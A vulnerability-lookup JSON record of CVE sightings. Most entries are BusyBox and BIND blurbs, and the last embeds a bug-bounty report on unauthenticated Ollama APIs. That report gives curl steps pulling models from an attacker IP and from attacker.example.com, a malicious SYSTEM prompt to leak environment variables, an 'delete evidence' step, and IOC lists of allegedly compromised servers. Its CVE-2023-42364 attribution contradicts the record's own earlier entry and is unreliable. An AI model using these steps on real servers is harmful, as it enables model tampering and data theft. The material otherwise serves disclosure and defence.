{"vulnerability": "cve-2023-4236", "sightings": [{"uuid": "935a1ee6-f7fd-4822-a227-12716832cbbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4236", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-319-08", "content": "", "creation_timestamp": "2024-11-14T12:00:00.000000Z"}, {"uuid": "e5972993-820d-4f14-97fe-c341e55029e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42366", "type": "seen", "source": "https://t.me/ctinow/155580", "content": "https://ift.tt/N9pVqK7\nCVE-2023-42366 | BusyBox 1.36.1 awk.c next_token heap-based overflow", "creation_timestamp": "2023-12-17T11:37:00.000000Z"}, {"uuid": "d47b473e-d2d0-430f-963a-72b85f2da73d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42363", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-043-06", "content": "", "creation_timestamp": "2026-02-12T11:00:00.000000Z"}, {"uuid": "1afa0cd5-9747-4354-b8f7-002e34d8fb0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42364", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-043-06", "content": "", "creation_timestamp": "2026-02-12T11:00:00.000000Z"}, {"uuid": "60997c75-5c90-415f-984c-8e9ff5b20fcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42365", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-043-06", "content": "", "creation_timestamp": "2026-02-12T11:00:00.000000Z"}, {"uuid": "8efbae5d-6fc2-424a-b433-bd34f2cbe8e4", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42366", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-043-06", "content": "", "creation_timestamp": "2026-02-12T11:00:00.000000Z"}, {"uuid": "ebaae8b2-e436-47dc-966f-30fe0d47cc08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2023-42366", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "552e91f1-165b-4c85-ab82-14bbe16b238e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42363", "type": "seen", "source": "https://t.me/arpsyndicate/2419", "content": "#ExploitObserverAlert\n\nCVE-2023-42363\n\nDESCRIPTION: Exploit Observer has 1 entries related to CVE-2023-42363. 
A use-after-free vulnerability was discovered in xasprintf function in xfuncs_printf.c:344 in BusyBox v.1.36.1.\n\nFIRST-EPSS: 0.000440000\nNVD-IS: 3.6\nNVD-ES: 1.8", "creation_timestamp": "2024-01-04T03:25:45.000000Z"}, {"uuid": "a5663344-a641-4488-a4d8-fb60e5b2d4cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42364", "type": "seen", "source": "https://t.me/ctinow/155589", "content": "https://ift.tt/RphYrc3\nCVE-2023-42364 | BusyBox 1.36.1 awk.c evaluate denial of service", "creation_timestamp": "2023-12-17T12:41:51.000000Z"}, {"uuid": "eca6740c-ba0c-4800-8ee4-d97f85247970", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42363", "type": "seen", "source": "https://t.me/ctinow/155582", "content": "https://ift.tt/A4LB9pK\nCVE-2023-42363 | BusyBox 1.36.1 xfuncs_printf.c xasprintf use after free", "creation_timestamp": "2023-12-17T11:37:02.000000Z"}, {"uuid": "59341cf1-c04b-4c4d-b203-36ec8946d09a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42365", "type": "seen", "source": "https://t.me/ctinow/155581", "content": "https://ift.tt/tmkEidN\nCVE-2023-42365 | BusyBox 1.36.1 awk.c copyvar use after free", "creation_timestamp": "2023-12-17T11:37:01.000000Z"}, 
{"uuid": "66e5eed3-be5f-4749-8c84-9ce0f6d4a2eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4236", "type": "seen", "source": "https://t.me/true_secator/4880", "content": "Serious flaws that can be exploited for DoS and RCE have been found in Atlassian and ISC BIND products.\n\nThe Australian software vendor has released fixes in new versions for four serious bugs in Jira, Confluence, Bitbucket and Bamboo.\n\nThe most serious of these issues, CVE-2023-22513 (CVSS: 8.5), is described as an RCE vulnerability in Bitbucket. An authenticated attacker can exploit the vulnerability without user interaction. The issue was introduced in Bitbucket version 8.0.0 and affects most releases up to version 8.14.0.\n\nThe second, CVE-2023-22512 (CVSS 7.5), is a DoS issue in the Confluence Data Center and Server products (starting with version 5.6, it affects product releases up to and including 8.5.0). An unauthenticated attacker can exploit this vulnerability to deny access to resources, temporarily or indefinitely disrupting the services of a vulnerable host connected to the network.\n\nCVE-2023-28709 (CVSS 7.5) is described as a DoS bug in the Apache Tomcat server that affects Bamboo. In Apache Tomcat, the vulnerability exists because the fix for another vulnerability, CVE-2023-24998, was incomplete.\n\nThe updates released for Jira fix CVE-2022-25647 (CVSS 7.5), a deserialization bug in the Google Gson package that affects patch management in Jira Service Management.\n\nTwo serious bugs have been fixed by ISC in Berkeley Internet Name Domain 9 (BIND).\n\nCVE-2023-3341 (CVSS: 7.5) is a stack exhaustion bug in the control channel code and can lead to unexpected termination of the Name method (fixed in versions 9.16.44, 9.18.19, 9.19.17, 9.16.44-S1 and 9.18, 19-S1).\n\nThe other, CVE-2023-4236 (CVSS: 7.5), is a bug in the networking code that handles DNS-over-TLS queries and can lead to unexpected termination of named. This happens when internal data structures are incorrectly reused under significant query load (fixed in versions 9.18.19 and 9.18.19-S1).\n\nNo exploitation of the vulnerabilities in malicious attacks has been reported.", "creation_timestamp": "2023-09-22T14:38:21.000000Z"}, 
{"uuid": "5c8e9b16-4b2f-455e-94e1-a15433caae33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42362", "type": "seen", "source": "https://t.me/cibsecurity/70569", "content": "\u203c CVE-2023-42362 \u203c\n\nAn arbitrary file upload vulnerability in Teller Web App v.4.4.0 allows a remote attacker to execute arbitrary commands and obtain sensitive information via uploading a crafted file.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-15T00:24:59.000000Z"}, {"uuid": "68a8ca9a-9427-43e0-bee2-606c8d643914", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-4236", "type": "seen", "source": "https://t.me/cibsecurity/70798", "content": "\u203c CVE-2023-4236 \u203c\n\nA flaw in the networking code handling DNS-over-TLS queries may cause `named` to terminate unexpectedly due to an assertion failure. This happens when internal data structures are incorrectly reused under significant DNS-over-TLS query load.This issue affects BIND 9 versions 9.18.0 through 9.18.18 and 9.18.11-S1 through 9.18.18-S1.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-09-20T16:30:07.000000Z"}, {"uuid": "b1c080e6-050d-4512-9c08-8bdc898c4552", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-42364", "type": "seen", "source": "https://gist.github.com/k4w1992-lgtm/f7d62503adb3599bc60cdc0280254c23", "content": "# Huntr Submission: ollama/ollama \u2014 Unauthenticated Model Supply Chain Attack via Arbitrary Registry Pulling\n\n## TITLE\nUnauthenticated Ollama API allows arbitrary model injection from untrusted registries without integrity verification\n\n## DESCRIPTION\n\nOllama's HTTP API (`/api/pull`, `/api/create`, `/api/copy`) accepts unauthenticated requests that allow any network-reachable attacker to:\n\n1. **Pull models from arbitrary, untrusted container registries** with zero integrity verification (no signing, no hash validation against a trust store, no registry allowlist)\n2. **Create models from arbitrary GGUF files** via `/api/create` with a `FROM` directive pointing to any external URL or local path\n3. **Copy and overwrite existing models** without authorization\n\nThis is a **code-level design flaw**: Ollama's `api.go` and `image.go` perform no source validation on the registry URL or model provenance before downloading and loading GGUF files into process memory. 
Ollama's GGUF loader trusts tensor metadata without bounds checking before memory allocation, which has been shown to enable heap memory disclosure through crafted model files. Combined with the unauthenticated API, this creates a complete attack chain:\n\n**Unauthenticated pull from malicious registry \u2192 crafted GGUF loaded into process memory \u2192 heap OOB read via malformed GGUF tensor metadata \u2192 memory exfiltration via /api/show or /api/chat response**\n\n**Real-world evidence:** I have independently identified a sustained attack campaign exploiting this exact chain. Two production servers (95.217.135.66, 46.224.102.248) were found compromised with 6 malicious models (`leak_model_0-5`) pulled from `205.237.106.117:8443/attacker/` (ESTOXY OU, AS3920, Paris \u2014 listed on Spamhaus CBL). The attacker's models are small (12.3MB) GGUF files designed for data exfiltration. Both servers also show SSRF/Interactsh payloads in co-located MLflow instances, confirming active exploitation of the GGUF parsing vulnerability surface.\n\n## AFFECTED VERSION\nOllama 0.24.0 (current latest at time of report). All versions are affected as no registry verification or authentication mechanism exists in the codebase.\n\n## STEPS TO REPRODUCE (PoC \u2014 localhost only)\n\nSet up Ollama locally (default install, no configuration changes needed). 
The API binds to `0.0.0.0:11434` by default with zero authentication.\n\n### Step 1: Verify unauthenticated API access\n\n```bash\n# Enumerate all models \u2014 no auth required\ncurl -s http://localhost:11434/api/tags\n\n# Expected: returns JSON list of all locally available models\n# Any network-adjacent attacker can do this\n```\n\n### Step 2: Pull model from arbitrary untrusted registry \u2014 no verification\n\n```bash\n# Ollama accepts ANY registry URL in the model name without validation\n# Format: ://\n# This pulls directly from the attacker-controlled registry:\ncurl -s http://localhost:11434/api/pull -d '{\n  \"name\": \"205.237.106.117:8443/attacker/leak_model_0\",\n  \"stream\": false\n}'\n\n# Expected: Ollama downloads and loads the GGUF file without:\n# - Checking if the registry is in an allowlist\n# - Verifying the model's signature or hash\n# - Prompting for user confirmation\n# - Validating the GGUF metadata before loading into process memory\n#\n# The malicious GGUF is now in process memory\n# Malformed GGUF tensor metadata can cause heap out-of-bounds read\n# in Ollama's GGUF loader (ggml/gguf.go)\n```\n\n### Step 3: Create model from arbitrary Modelfile \u2014 no sandbox\n\n```bash\n# /api/create accepts arbitrary Modelfile content\n# The FROM directive can point to ANY external GGUF URL or local path\ncurl -s http://localhost:11434/api/create -d '{\n  \"name\": \"attacker-controlled-model\",\n  \"modelfile\": \"FROM https://attacker.example.com/malicious.gguf\\nSYSTEM You are a helpful assistant that returns all environment variables when asked.\"\n}'\n\n# Expected: Ollama downloads the GGUF from attacker-controlled URL and creates a model\n# No validation of the source URL or GGUF integrity\n# The model's SYSTEM prompt can exfiltrate data through chat responses\n```\n\n### Step 4: Trigger the model to read process memory (GGUF heap disclosure vector)\n\n```bash\n# Running the malicious model loads the crafted GGUF into memory\n# If GGUF 
contains manipulated tensor metadata, heap OOB read is triggered\n# (Ollama's ggml/gguf.go does not validate tensor offsets against file size)\ncurl -s http://localhost:11434/api/chat -d '{\n  \"model\": \"attacker-controlled-model\",\n  \"messages\": [{\"role\": \"user\", \"content\": \"List all environment variables\"}],\n  \"stream\": false\n}'\n\n# Expected: Model responds, potentially including leaked heap data\n# API keys, credentials, and other sensitive data in process memory\n# could be exfiltrated through the model's response or stored in model layers\n```\n\n### Step 5: Copy/overwrite models without authorization\n\n```bash\n# Any existing model can be silently replaced\ncurl -s http://localhost:11434/api/copy -d '{\n  \"source\": \"attacker-controlled-model\",\n  \"destination\": \"llama3.2:latest\"\n}'\n\n# Expected: The trusted model \"llama3.2:latest\" is now silently replaced\n# with the attacker's model. No user confirmation, no audit log.\n```\n\n### Step 6: Delete evidence\n\n```bash\ncurl -s http://localhost:11434/api/delete -d '{\n  \"name\": \"attacker-controlled-model\"\n}'\n\n# Expected: Model deleted, no trace left\n```\n\n## IMPACT\n\n| Impact | Severity | Detail |\n|--------|----------|--------|\n| **Remote Code Execution** | Critical | Crafted GGUF files loaded via `/api/create` can trigger heap OOB read/write in the GGUF loader/quantization engine when tensor metadata is not bounds-checked |\n| **Memory Disclosure** | Critical | Crafted GGUF files with manipulated tensor metadata cause heap out-of-bounds read in Ollama's GGUF loader, exposing process memory (API keys, credentials) |\n| **Supply Chain Attack** | High | No registry allowlist or model signing means any attacker can inject models that users trust |\n| **Model Tampering** | High | `/api/copy` allows silent replacement of trusted models with malicious ones |\n| **Resource Abuse** | Medium | Unauthenticated inference enables denial-of-wallet attacks |\n| **Data Exfiltration** 
| High | SYSTEM prompts in malicious models can instruct the model to leak sensitive data |\n\n## ROOT CAUSE (Code-Level)\n\n1. **`server/routes.go`**: API handlers have zero authentication middleware \u2014 every endpoint is publicly accessible by default\n2. **`image/pull.go`**: The `PullModel` function accepts any registry URL in the model name without validation against an allowlist\n3. **`ggml/gguf.go`**: GGUF tensor metadata is trusted without bounds checking before memory allocation, enabling heap OOB read via crafted GGUF files\n4. **`server/model.go`**: `/api/copy` and `/api/create` have no authorization checks or user confirmation\n\n## RECOMMENDATION\n\n1. Add an `OLLAMA_ALLOWED_REGISTRIES` config option (default: `registry.ollama.ai` only)\n2. Add basic API authentication (token or API key) as an opt-in config\n3. Implement GGUF metadata validation before loading (check tensor offsets against file size)\n4. Require user confirmation for `/api/copy` operations that overwrite existing models\n5. 
Add audit logging for all model lifecycle operations\n\n## REAL-WORLD CAMPAIGN EVIDENCE\n\nThis vulnerability chain is being **actively exploited in the wild**:\n\n- **2+ production servers** confirmed compromised with `leak_model_0-5` models from `205.237.106.117:8443/attacker/`\n- **Attacker organization**: ESTOXY OU / PUSHPKT OU (AS3920, Paris, France) \u2014 listed on Spamhaus CBL\n- **1,521+ exposed MLflow/Ollama instances** identified via Censys scanning\n- **SSRF/Interactsh payloads** (oast.me, oast.fun, oast.live, dnsg.cc) found in model version source URLs, confirming CVE-2023-1177 and related SSRF exploitation\n- All malicious models are small (12.3MB) GGUF files consistent with data exfiltration payloads, not legitimate ML models\n\n## IOCs\n\n| Type | Value |\n|------|-------|\n| Attacker IP | 205.237.106.117 |\n| Attacker CIDR | 205.237.104.0/22 |\n| Attacker Registry | 205.237.106.117:8443 |\n| Attacker Org | ESTOXY OU / PUSHPKT OU (AS3920) |\n| Malicious Models | leak_model_0-5_* (variants: _198e01, _cc509d) |\n| SSRF Domains | *.oast.me, *.oast.fun, *.oast.live, *.a.dnsg.cc |\n| Model Digests | See Appendix A of MLflow_Kompromission_Rapport |\n\n\n# Compromised MLflow/Ollama Servers - Evidence Dump\n# Date: 2026-05-18\n\n## Confirmed compromised servers (6+)\n\n### 146.190.23.12 (DigitalOcean)\n- SSRF: ml-cbYCAjKm \u2192 dnsg.cc/poc.tar.gz\n- Path traversal: /proc/1, /proc/self\n- MLflow with 64 models, Streamlit on 8501\n- MinIO port 9000 (403)\n- Severity: CRITICAL\n\n### 168.119.201.8 (Hetzner)\n- SSRF: ml-qZeqKYkU \u2192 dnsg.cc/poc.tar.gz\n- SSRF: ml-zYpWAjpC \u2192 dnsg.cc/poc.tar.gz\n- SSRF: poc_1966 \u2192 1.2.3.4:4444\n- MLflow with 46 models, Streamlit on 8501\n- Severity: CRITICAL\n\n### 168.119.201.89 (Hetzner)\n- Same model set as 168.119.201.8 (shared backend/cluster)\n- MLflow with 46 models, Streamlit on 8501\n- Severity: CRITICAL\n\n### 188.166.132.129 (DigitalOcean NL)\n- SSRF: ml-tGBNqorN, ml-wyGCEmAD \u2192 
dnsg.cc/poc.tar.gz\n- SSRF: UHKOPQ \u2192 oast.live\n- Path traversal: /proc/1, /proc/self\n- MLflow with 63 models, Streamlit on 8501\n- MinIO port 9000 (403)\n- Severity: CRITICAL\n\n### 188.166.38.104 (DigitalOcean)\n- SSRF: ml-tGBNqorN, ml-wyGCEmAD \u2192 dnsg.cc/poc.tar.gz\n- SSRF: UHKOPQ \u2192 oast.live\n- Path traversal: /proc/1, /proc/self\n- MLflow with 63 models, Streamlit on 8501\n- MinIO port 9000 (403)\n- Severity: CRITICAL\n\n### 91.98.85.183 (Hetzner DE)\n- SSRF: ml-rjGjvzXy \u2192 dnsg.cc/poc.tar.gz\n- PATH TRAVERSAL: ../../../../../../../../../../../ in 4 models + dbfs:/\n- MLflow with 42 models, Streamlit on 8501\n- MinIO port 9000 (403)\n- Severity: CRITICAL\n\n### 95.217.135.66 (Hetzner FI) \u2014 PREVIOUSLY KNOWN\n- 6x leak_model_0-5 from 205.237.106.117:8443/attacker/\n- Ollama exposed on port 11434\n- SSRF: oast.me, dnsg.cc in model sources\n- Severity: CRITICAL\n\n### 46.224.102.248 (Hetzner DE) \u2014 PREVIOUSLY KNOWN\n- 6x leak_model_0-5 from 205.237.106.117:8443/attacker/\n- SSRF: oast.fun, oast.live, dnsg.cc in model sources\n- ProtectAI scanner artifacts\n- MinIO HTTPS on 9001\n- Severity: CRITICAL\n\n## New IOCs\n\n### dnsg.cc hashes (SSRF/PoC delivery)\n\n### OAST domains (Interactsh SSRF callbacks)\n\n### Reverse shell / SSRF targets\n- 1.2.3.4:4444 (classic SSRF/null IP callback)\n\n### Path traversal patterns (CVE-2023-42364 active exploitation)\n- 
../../../../../../../../../../../ (91.98.85.183, 4 models)\n- /proc/1 (146.190.23.12, 188.166.132.129, 188.166.38.104)\n- /proc/self (146.190.23.12, 188.166.132.129, 188.166.38.104)\n- dbfs:/ (91.98.85.183, 46.224.102.248 \u2014 Databricks filesystem access)\n\n### Attacker infrastructure\n- 205.237.106.117:8443/attacker/ (ESTOXY OU / PUSHPKT OU, AS3920, Paris)\n- 205.237.104.0/22 (attacker CIDR block)\n- dnsg.cc (Interactsh SSRF callback domain)\n- oast.me, oast.fun, oast.live (OAST callback domains)\n\n### Malicious model naming patterns\n- leak_model_0-5_* (with unique suffixes per target: _198e01, _cc509d)\n- ml-* (random hash names, SSRF/OAST sources)\n- ProtectAI scanner artifacts (protectai-* UUIDs on 46.224.102.248)\n- Poultry biotech models: breeders_5_heads_model, gc_loss_model, gc_slaughter_house_model, dk_weight_model, TAH_LOSS_MODEL (possibly compromised company)\n\n## CVEs being actively exploited\n\n| CVE | Description | Evidence |\n|-----|-------------|----------|\n| CVE-2023-1177 | MLflow SSRF via model registry source URL | oast.me, oast.fun, oast.live, dnsg.cc in model source URLs |\n| CVE-2023-42364 | MLflow path traversal in artifact URLs | ../../../../../../../../../../../ and /proc/self in model sources |\n| N/A | Ollama unauthenticated model injection from arbitrary registry | leak_model_0-5 from 205.237.106.117:8443/attacker/ |\n| N/A | Unauthenticated Streamlit/MLflow exposure | 6+ servers with zero auth on both Streamlit and MLflow |\n\n## Model source categories across all servers\n\n| Category | Example | Indicator |\n|----------|---------|-----------|\n| Legitimate ML models | breeders_5_heads_model, gc_loss_model, TAH_LOSS_MODEL | s3://flow-bucket paths |\n| SSRF payloads | ml-cbYCAjKm, ml-qZeqKYkU | dnsg.cc, oast.live URLs |\n| Path traversal | q94722, r17131, 38994GE3E2sFHE0z7ekpEplvWwo | /proc/1, /../ paths |\n| ProtectAI scans | protectai-* UUIDs | Automatic CVE scanner |\n| Malicious Ollama models | leak_model_0-5 | 
205.237.106.117:8443/attacker/ |\n| Reverse shell SSRF | poc_1966 | 1.2.3.4:4444 |\n\n## Update to Huntr Submission\n\nThe campaign is larger than originally reported:\n- 6+ compromised servers (not only 2)\n- Active path traversal exploitation (CVE-2023-42364)\n- 6 new dnsg.cc hashes\n- Reverse shell target 1.2.3.4:4444\n- Databricks filesystem access (dbfs:/)\n", "creation_timestamp": "2026-05-18T18:18:06.000000Z"}]}